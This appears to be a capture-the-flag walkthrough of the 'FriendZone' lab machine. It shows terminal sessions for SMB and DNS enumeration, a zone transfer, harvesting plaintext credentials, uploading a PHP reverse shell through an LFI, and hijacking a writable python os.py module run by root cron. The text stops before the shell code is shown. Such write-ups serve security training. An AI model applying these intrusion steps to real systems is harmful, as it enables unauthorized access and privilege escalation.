┌──(kali💀kali)-[~/Desktop]
└─$ nmap --script smb-enum-shares.nse -p445 10.10.10.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 01:24 EST
Nmap scan report for friendzoneportal.red (10.10.10.123)
Host is up (0.47s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
HTTP Port 80/tcp
I always start off with enumerating HTTP first. In this case both 80 and 443 are open so we’ll start there. We can see the email is info@friendzoneportal.red. The friendzoneportal.red could be a possible domain name. We’ll keep it in mind when enumerating DNS.
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.123/
- Nikto v2.5.0
+ Target IP: 10.10.10.123
+ Target Hostname: 10.10.10.123
+ Target Port: 80
+ Start Time: 2024-01-07 22:11:15 (GMT-5)
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 144, size: 577831e9005e6, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wordpress/: Directory indexing found.
+ 8048 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2024-01-07 23:13:07 (GMT-5) (3712 seconds)
Enumeration: HTTPS Port 443/tcp
Visiting the site over HTTPS (port 443) gives us an error.
https://10.10.10.123/
Not Found
The requested URL / was not found on this server.
Apache/2.4.29 (Ubuntu) Server at 10.10.10.123 Port 443
/admin is an empty dir just like /wordpress was on http:
/js has something in it:
Going to https://friendzone.red/js/js/ gives a page:
https://friendzone.red/js/js/
Testing some functions !
I'am trying not to break things !
Z2pPVHFINUs4cTE3MDQ2OTUyMzNtejFyWVlBNUhT
The source reveals it also has some comments:
<p>Testing some functions !</p><p>I'am trying not to break things !</p>
S0s4ZGFJdjFibDE1NDk5MjIwMDJIbWt2TmtKZThr<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! -->
This doesn’t have much meaning to me yet. Might be an allusion to DNS zones. Or it might just be a troll.
Enumeration: ISC BIND Port 53/tcp
Try to get a domain name for the IP address using nslookup.
9.11.3–1ubuntu1.2 (DNS)
We don’t get anything. However, we do have two possible domains from previous enumeration steps:
friendzone.red from the nmap scan, and
friendzoneportal.red from the HTTP website
Let’s try a zone transfer on both domains.
zone transfer command: host -l <dns_server-address>
┌──(kali💀kali)-[~]
└─$ host -l friendzoneportal.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzoneportal.red has IPv6 address ::1
friendzoneportal.red name server localhost.
friendzoneportal.red has address 127.0.0.1
admin.friendzoneportal.red has address 127.0.0.1
files.friendzoneportal.red has address 127.0.0.1
imports.friendzoneportal.red has address 127.0.0.1
vpn.friendzoneportal.red has address 127.0.0.1
┌──(kali💀kali)-[~]
└─$ host -l friendzone.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1
Add all the domains/subdomains in the /hosts/etc file.
Now we start visiting the subdomains we found. Remember that we have to visit them over both HTTP and HTTPS because we’re likely to get different results.
The following sites showed us particularly interesting results.
I tried default credentials on the admin sites but that didn’t work. Before we run a password cracker on those two sites, let’s enumerate SMB. We might find credentials there.
Enumeration: Ports 139 / Port 445/tcp: Samba smbd 4.7.6-Ubuntu
Run smbmap to list available shares and permissions.
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.123
[+] IP: 10.10.10.123:445 Name: friendzoneportal.red Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
We have READ access on the general share and READ/WRITE access on the Development share. List the content of the shares.
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.123 -r
[+] IP: 10.10.10.123:445 Name: friendzoneportal.red Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
./general
dr--r--r-- 0 Wed Jan 16 15:10:51 2019 .
dr--r--r-- 0 Tue Sep 13 10:56:24 2022 ..
fr--r--r-- 57 Tue Oct 9 19:52:42 2018 creds.txt
Development READ, WRITE FriendZone Samba Server Files
./Development
dr--r--r-- 0 Mon Jan 8 00:58:36 2024 .
dr--r--r-- 0 Tue Sep 13 10:56:24 2022 ..
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
-R: Recursively list directories and files on all accessible shares
The Development share does not contain anything, but the general directory has a file named creds.txt! Before we download the file, let’s use smbclient to view more information about the shares.
┌──(kali💀kali)-[~]
└─$ smbclient -L //10.10.10.123
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP FRIENDZONE
-L: look at what services are available on a server
The extra information this gives us over smbmap is the Comment column. We can see that the files in the Files share are stored in /etc/Files on the system. Therefore, there’s a good possibility that the files stored in the Development share (which we have WRITE access to) are stored in /etc/Development. We might need this piece of information in the exploitation phase.
Let’s get the creds.txt file. First, login anonymously (without a password) into the general share.
┌──(kali💀kali)-[~]
└─$ smbclient //10.10.10.123/general -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jan 16 15:10:51 2019
.. D 0 Tue Sep 13 10:56:24 2022
creds.txt N 57 Tue Oct 9 19:52:42 2018
-N: suppresses the normal password prompt from the client to the user
Download the creds.txt file from the target machine to the attack machine.
smb: \> get creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
creds for the admin THING:admin:WORKWORKHhallelujah@#
https://admin.friendzoneportal.red/
https://admin.friendzoneportal.red/login.php
Admin page is not developed yet !!! check for another one
Also doesn’t work. Next, try the credentials on the
https://administrator1.friendzone.red/
We’re in! Visit the /dashboard.php page.
https://administrator1.friendzone.red/dashboard.php
Smart photo script for friendzone corp !
* Note : we are dealing with a beginner php developer and the application is not tested yet !
image_name param is missed !
please enter it to show the image
default is image_id=a.jpg&pagename=timestamp
It seems to be a page that allows you to view images on the site. We’ll try to gain initial access through this page.
The dashboard.php page gives us instructions on how to view an image. We need to append the following to the URL.
During our enumeration phase, we found a URL, that allows us to upload images. Let’s try and see if the images we upload there can be viewed through the dashboard page.
┌──(kali💀kali)-[~]
└─$ ssh admin@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
admin@10.10.10.123's password:
Permission denied, please try again.
Also doesn’t work.
Shell as www.data
LFI
Based on the recon above, there’s a likely local file include (LFI) in this page. Both parameters have potential.
Nope, it doesn’t find the image. Let’s move our focus to the pagename parameter. It seems to be running a timestamp script that generates a timestamp and outputs it on the page. Based on the way the application is currently working, my gut feeling is that it takes the filename “timestamp” and appends “.php” to it and then runs that script. Therefore, if this is vulnerable to LFI, it would be difficult to disclose sensitive files since the “.php” extension will get added to my query.
Instead, let’s try first uploading a php file and then exploiting the LFI vulnerability to output something on the page. During the enumeration phase, we found that we have READ and WRITE permissions on the Development share and that it’s likely that the files uploaded on that share are stored in the location /etc/Development (based on the Comments column).
┌──(kali💀kali)-[~/Desktop]
└─$ curl -k https://administrator1.friendzone.red/timestamp.php
Final Access timestamp is 1704699293
Let’s create a simple test.php script that outputs the string “It’s working!” on the page.
<?php
echo "It's working!";
?>
Log into the Development share.
┌──(kali💀kali)-[~/Desktop]
└─$ smbclient //10.10.10.123/Development -N
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (3.3 kb/s) (average 3.3 kb/s)
This gives us a partially interactive bash shell. To get a fully interactive shell, background the session (CTRL+ Z) and run the following in your terminal which tells your terminal to pass keyboard shortcuts to the shell.
In the /var/www/ directory, there’s folders for all the different sites, as well as an sql conf file:
www-data@FriendZone:/etc/Development$ cd /var/www/
www-data@FriendZone:/var/www$ ls
ls
admin friendzoneportal html uploads
friendzone friendzoneportaladmin mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
Those creds happen to work for friend. I can either su friend:
SU:
www-data@FriendZone:/var/www$ su friend
su friend
Password: Agpyu12!0.213$
friend@FriendZone:/var/www$ whoami
friend
friend@FriendZone:/var/www$ id
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
SSH:
or ssh in with them:
┌──(kali💀kali)-[~]
└─$ ssh friend@10.10.10.123
friend@10.10.10.123's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$
friend@FriendZone:~$ ls
user.txt
friend@FriendZone:~$ cat user.txt
69559-----------------------------
We have rwx privileges on the /etc/Development directory as www-data. So let’s upload the LinEnum script in the Development share.
┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$ smbclient //10.10.10.123/Development -N
Try "help" to get a list of possible commands.
smb: \> put LinEnum.sh
Give the script execute permissions.
chmod +x LinEnum.sh
I don’t seem to have execute permissions in that directory, so I’ll copy it to the tmp directory.
Navigate to the /tmp directory and try again.
cd /tmp/
chmod +x LinEnum.sh
That works, so the next step is to execute the script.
./LinEnum.sh
The results from LinEnum don’t give us anything that we could use to escalate privileges. So let’s try pspy. If you don’t have the script, you can download it from the following github repository.
Upload it and run it on the attack machine in the same way we did for LinEnum.
Priv: friend to root
It seems that the reporter.py script is getting executed every couple of minutes as a scheduled task. Let’s view the permissions we have on that file.
We only have read permission. So let’s view the content of the file.
friend@FriendZone:~$ cat /opt/server_admin/reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
Here’s the soure code of the script. Most of the script is commented out so there isn’t much to do there. It does import the os module. Maybe we can hijack that. Locate the module on the machine.
Navigate to the directory and view the permissions on the file
friend@FriendZone:~$ cd /usr/lib/python2.7
friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 os.py
-rw-rw-r-- 1 friend friend 25583 Jan 15 2019 os.pyc
We have rwx privileges on the os.py module! This is obviously a security misconfiguration. As a non-privileged user, I should only have read access to the script. If we add a reverse shell to the script and wait for the root owned scheduled task to run, we’ll get back a reverse shell with root privileges!
I tried accessing the os.py script using vi but the terminal was a bit screwed up. Here’s a way to fix it (courtesy of ippsec). Go to a new pane in the attack machine and enter the following command.
Even after this, vi was still a bit glitchy, so instead, I decided to download the os.py module to my attack machine using SMB, add the reverse shell there and upload it back to the target machine. Add the following reverse shell code to the bottom of the os.py file and upload it back to the target machine.
